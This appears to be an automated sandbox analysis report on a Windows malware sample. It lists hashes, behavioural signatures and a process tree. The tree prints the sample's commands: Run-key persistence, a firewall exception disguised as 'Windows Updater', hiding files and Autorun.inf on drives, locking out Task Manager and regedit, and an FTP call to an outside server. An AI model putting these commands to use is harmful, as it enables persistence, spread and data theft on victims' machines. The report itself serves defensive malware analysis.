Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24/01/2024, 10:23
Static task
static1
Behavioral task
behavioral1
Sample
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
Resource
win10v2004-20231215-en
General
-
Target
71fb31da3cbf7262ee9ee1ed4b04a4c6.exe
-
Size
68KB
-
MD5
71fb31da3cbf7262ee9ee1ed4b04a4c6
-
SHA1
4c5e26eb2962f2b41fe4bd36800f6b3f4e232803
-
SHA256
4648b2e57b32d4c0cb8a818996493bde37b7ef24dd266b6e8602112ee7865d6c
-
SHA512
d4ee55a40fda8df91b0155009337635125d47bc6414883e1296aa13635750413858c209c5904047645a4302880ec8cbafa28220de4f8dbeac51d6397bfea3e52
-
SSDEEP
1536:F9wvQUreUbyzsB+2zeNOVffLoSkqeRiq8b:tA/yzn2ze8VfcfJMq8b
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\svcsrss.exe = "C:\\Windows\\system32\\svcsrss.exe:*:Enabled:Windows Updater" reg.exe -
Sets file to hidden 1 TTPs 38 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2972 attrib.exe 3592 attrib.exe 756 attrib.exe 2972 attrib.exe 1496 attrib.exe 5004 attrib.exe 4540 attrib.exe 3296 attrib.exe 2888 attrib.exe 2140 attrib.exe 964 attrib.exe 3204 attrib.exe 4464 attrib.exe 2808 attrib.exe 3612 attrib.exe 4844 attrib.exe 3600 attrib.exe 3380 attrib.exe 4684 attrib.exe 628 attrib.exe 2012 attrib.exe 4740 attrib.exe 2160 attrib.exe 2872 attrib.exe 4484 attrib.exe 5032 attrib.exe 1352 attrib.exe 900 attrib.exe 4000 attrib.exe 2588 attrib.exe 3264 attrib.exe 1580 attrib.exe 3164 attrib.exe 2652 attrib.exe 3672 attrib.exe 2996 attrib.exe 112 attrib.exe 2524 attrib.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\system32\\svcsrss.exe" reg.exe -
Drops autorun.inf file 1 TTPs 35 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf cmd.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf cmd.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf cmd.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe File opened for modification F:\Autorun.inf attrib.exe File opened for modification C:\Autorun.inf attrib.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\svcsrss.exe attrib.exe File opened for modification C:\Windows\SysWOW64\regedit cmd.exe File opened for modification C:\Windows\SysWOW64\config\EYHRDPTG.LOG cmd.exe File opened for modification C:\Windows\SysWOW64\config\firmware.LOG cmd.exe File opened for modification C:\Windows\SysWOW64\svcsrss.exe cmd.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 8 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process 4956 taskkill.exe 4080 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e003100000000003858ef52100054656d7000003a0009000400efbe8f57da663858ef522e00000094e1010000000100000000000000000000000000000045e19a00540065006d007000000014000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000008f57da661100557365727300640009000400efbe874f77483858ef522e000000c70500000000010000000000000000003a0000000000b8cfca0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000008f57c36910004c6f63616c003c0009000400efbe8f57da663858ef522e00000093e1010000000100000000000000000000000000000059472b014c006f00630061006c00000014000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000008f57566c100041646d696e003c0009000400efbe8f57da663858ef522e00000075e101000000010000000000000000000000000000004fbde200410064006d0069006e00000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000008f57da6612004170704461746100400009000400efbe8f57da663858ef522e00000080e1010000000100000000000000000000000000000070fcb2004100700070004400610074006100000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 2600 PING.EXE 1520 PING.EXE 1632 PING.EXE 1092 PING.EXE 3896 PING.EXE 4072 PING.EXE 2780 PING.EXE 5012 PING.EXE 64 PING.EXE 4212 PING.EXE 2856 PING.EXE 2488 PING.EXE 4596 PING.EXE 4296 PING.EXE 828 PING.EXE 864 PING.EXE 1060 PING.EXE 5116 PING.EXE 4624 PING.EXE 3040 PING.EXE 4680 PING.EXE 4852 PING.EXE 2404 PING.EXE 2672 PING.EXE 3096 PING.EXE 2564 PING.EXE 4684 PING.EXE 4948 PING.EXE 3380 PING.EXE 3816 PING.EXE 3368 PING.EXE 876 PING.EXE 868 PING.EXE 4564 PING.EXE 3800 PING.EXE 4984 PING.EXE 2816 PING.EXE 864 PING.EXE 2920 PING.EXE 4204 PING.EXE 2648 PING.EXE 2440 PING.EXE 4244 PING.EXE 4684 PING.EXE 1044 PING.EXE 1552 PING.EXE 440 PING.EXE 2112 PING.EXE 4836 PING.EXE 2868 PING.EXE 4768 PING.EXE 4104 PING.EXE 5048 PING.EXE 1152 PING.EXE 3580 PING.EXE 4180 PING.EXE 3640 PING.EXE 4768 PING.EXE 2880 PING.EXE 4280 PING.EXE 1948 PING.EXE 3420 PING.EXE 4008 PING.EXE 3536 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3660 explorer.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4956 taskkill.exe Token: SeDebugPrivilege 4080 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3660 explorer.exe 3660 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1108 wrote to memory of 1576 1108 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 85 PID 1108 wrote to memory of 1576 1108 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 85 PID 1108 wrote to memory of 1576 1108 71fb31da3cbf7262ee9ee1ed4b04a4c6.exe 85 PID 1576 wrote to memory of 2136 1576 cmd.exe 89 PID 1576 wrote to memory of 2136 1576 cmd.exe 89 PID 1576 wrote to memory of 4956 1576 cmd.exe 88 PID 1576 wrote to memory of 4956 1576 cmd.exe 88 PID 1576 wrote to memory of 4956 1576 cmd.exe 88 PID 1576 wrote to memory of 4080 1576 cmd.exe 92 PID 1576 wrote to memory of 4080 1576 cmd.exe 92 PID 1576 wrote to memory of 4080 1576 cmd.exe 92 PID 1576 wrote to memory of 4740 1576 cmd.exe 93 PID 1576 wrote to memory of 4740 1576 cmd.exe 93 PID 1576 wrote to memory of 4740 1576 cmd.exe 93 PID 1576 wrote to memory of 3372 1576 cmd.exe 94 PID 1576 wrote to memory of 3372 1576 cmd.exe 94 PID 1576 wrote to memory of 3372 1576 cmd.exe 94 PID 1576 wrote to memory of 1152 1576 cmd.exe 95 PID 1576 wrote to memory of 1152 1576 cmd.exe 95 PID 1576 wrote to memory of 1152 1576 cmd.exe 95 PID 1576 wrote to memory of 1196 1576 cmd.exe 96 PID 1576 wrote to memory of 1196 1576 cmd.exe 96 PID 1576 wrote to memory of 1196 1576 cmd.exe 96 PID 1576 wrote to memory of 8 1576 cmd.exe 97 PID 1576 wrote to memory of 8 1576 cmd.exe 97 PID 1576 wrote to memory of 8 1576 cmd.exe 97 PID 1576 wrote to memory of 916 1576 cmd.exe 98 PID 1576 wrote to memory of 916 1576 cmd.exe 98 PID 1576 wrote to memory of 916 1576 cmd.exe 98 PID 1576 wrote to memory of 1632 1576 cmd.exe 99 PID 1576 wrote to memory of 1632 1576 cmd.exe 99 PID 1576 wrote to memory of 1632 1576 cmd.exe 99 PID 1576 wrote to memory of 2188 1576 cmd.exe 107 PID 1576 wrote to memory of 2188 1576 cmd.exe 107 PID 1576 wrote to memory of 2188 1576 cmd.exe 107 PID 1576 wrote to memory of 2872 1576 cmd.exe 108 PID 1576 wrote to memory of 2872 1576 cmd.exe 108 PID 1576 wrote to memory of 2872 1576 cmd.exe 108 PID 1576 wrote to memory of 3204 1576 cmd.exe 109 PID 1576 wrote to memory of 3204 1576 cmd.exe 109 PID 1576 wrote to memory of 3204 1576 cmd.exe 109 PID 1576 wrote to memory of 4120 1576 cmd.exe 110 PID 1576 wrote to memory of 4120 1576 cmd.exe 110 PID 1576 wrote to memory of 4120 1576 cmd.exe 110 PID 1576 wrote to memory of 4684 1576 cmd.exe 111 PID 1576 wrote to memory of 4684 1576 cmd.exe 111 PID 1576 wrote to memory of 4684 1576 cmd.exe 111 PID 1576 wrote to memory of 2156 1576 cmd.exe 113 PID 1576 wrote to memory of 2156 1576 cmd.exe 113 PID 1576 wrote to memory of 2156 1576 cmd.exe 113 PID 1576 wrote to memory of 2972 1576 cmd.exe 114 PID 1576 wrote to memory of 2972 1576 cmd.exe 114 PID 1576 wrote to memory of 2972 1576 cmd.exe 114 PID 1576 wrote to memory of 2652 1576 cmd.exe 115 PID 1576 wrote to memory of 2652 1576 cmd.exe 115 PID 1576 wrote to memory of 2652 1576 cmd.exe 115 PID 1576 wrote to memory of 3444 1576 cmd.exe 116 PID 1576 wrote to memory of 3444 1576 cmd.exe 116 PID 1576 wrote to memory of 3444 1576 cmd.exe 116 PID 1576 wrote to memory of 628 1576 cmd.exe 117 PID 1576 wrote to memory of 628 1576 cmd.exe 117 PID 1576 wrote to memory of 628 1576 cmd.exe 117 PID 1576 wrote to memory of 3632 1576 cmd.exe 118 PID 1576 wrote to memory of 3632 1576 cmd.exe 118 -
Views/modifies file attributes 1 TTPs 55 IoCs
pid Process 964 attrib.exe 2160 attrib.exe 4128 attrib.exe 2972 attrib.exe 4760 attrib.exe 4540 attrib.exe 3600 attrib.exe 1496 attrib.exe 1352 attrib.exe 3264 attrib.exe 4764 attrib.exe 3164 attrib.exe 4844 attrib.exe 3652 attrib.exe 2972 attrib.exe 2652 attrib.exe 3204 attrib.exe 2808 attrib.exe 4228 attrib.exe 2012 attrib.exe 1464 attrib.exe 2872 attrib.exe 4484 attrib.exe 5032 attrib.exe 1156 attrib.exe 4464 attrib.exe 2420 attrib.exe 3296 attrib.exe 444 attrib.exe 4452 attrib.exe 756 attrib.exe 4768 attrib.exe 3088 attrib.exe 900 attrib.exe 4000 attrib.exe 4368 attrib.exe 3612 attrib.exe 2996 attrib.exe 2156 attrib.exe 5004 attrib.exe 1580 attrib.exe 628 attrib.exe 112 attrib.exe 4684 attrib.exe 4516 attrib.exe 2140 attrib.exe 2524 attrib.exe 2588 attrib.exe 2888 attrib.exe 3672 attrib.exe 3380 attrib.exe 4740 attrib.exe 1520 attrib.exe 3592 attrib.exe 5104 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~68DC.bat "C:\Users\Admin\AppData\Local\Temp\71fb31da3cbf7262ee9ee1ed4b04a4c6.exe"2⤵
- Drops autorun.inf file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im * /fi "WINDOWTITLE eq svcsrss" /f /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "C:\Users\Admin\AppData\Local\Temp"3⤵PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ninja.exe /f /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Windows\system32\svcsrss.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4740
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\taskmgr.exe /e /d todos3⤵PID:3372
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\Windows\system32\svcsrss.exe /t REG_SZ /d "C:\Windows\system32\svcsrss.exe:*:Enabled:Windows Updater" /f3⤵
- Modifies firewall policy service
PID:1152
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\regedit" /e /c /d Todos3⤵PID:1196
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig3⤵
- Gathers network information
PID:8
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /e /p Todos:f3⤵PID:916
-
-
C:\Windows\SysWOW64\ftp.exeftp -s:C:\Windows\system32\config\firmware.LOG ftp.xpg.com.br3⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2188
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2872
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3204
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4120
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4684
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Views/modifies file attributes
PID:2156
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2972
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\svcsrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2652
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3444
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:628
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3632
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Views/modifies file attributes
PID:444
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:4484
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\svcsrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1496
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:828
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2868
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4180
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4388
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:864
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3208
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4080
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4760
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4072
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1928
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2112
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3964
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1972
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4680
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4164
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3508
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4032
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2816
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4768
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1632
-
-
